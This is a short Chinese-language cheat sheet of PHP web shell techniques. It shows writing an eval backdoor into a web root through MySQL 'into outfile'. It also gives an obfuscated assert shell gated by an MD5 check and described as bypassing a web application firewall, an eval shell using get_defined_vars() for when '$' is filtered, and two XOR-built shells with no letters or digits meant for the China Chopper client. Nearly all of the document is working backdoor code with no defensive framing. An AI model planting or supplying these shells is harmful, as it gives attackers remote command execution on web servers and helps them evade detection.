1.mysql执行语句拿shell
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'E:\phpStudy\PHPTutorial\WWW\test.php';
2.利用md5绕过waf
---------------------
本体
<?php
$str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';
$str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));
$str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
$str4 = strrev($_POST['a']);
$str5 = strrev($str4);
$str3($str5);
}
?>
---------------------
本质
<?php
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
assert($_POST['a']);
}
?>
------------------------利用
.php?a=3fion0hj5965698jhh密码a
注:default失败!其他编码成功!
3.get_defined_vars()函数马:在过滤$的情况下可使用
<?php
eval(get_defined_vars()['_POST']['1']);
?>
4.不含字母数字马
注:只能菜刀连接!
<?php
$_=(chr(0x01)^'`').(chr(0x13)^'`').(chr(0x13)^'`').(chr(0x05)^'`').(chr(0x12)^'`').(chr(0x14)^'`');
$__='_'.(chr(0x0D)^']').(chr(0x2F)^'`').(chr(0x0E)^']').(chr(0x09)^']');
$___=$$__;
$_($___['_']);// assert($_POST['_']);
?>
或者
<?php
$_=(urldecode('%01')^'`').(urldecode('%13')^'`').(urldecode('%13')^'`').(urldecode('%05')^'`').(urldecode('%12')^'`').(urldecode('%14')^'`');
$__='_'.(urldecode('%0D')^']').(urldecode('%2F')^'`').(urldecode('%0E')^']').(urldecode('%09')^']');
$___=$$__;
$_($___['_']);// assert($_POST['_']);
?>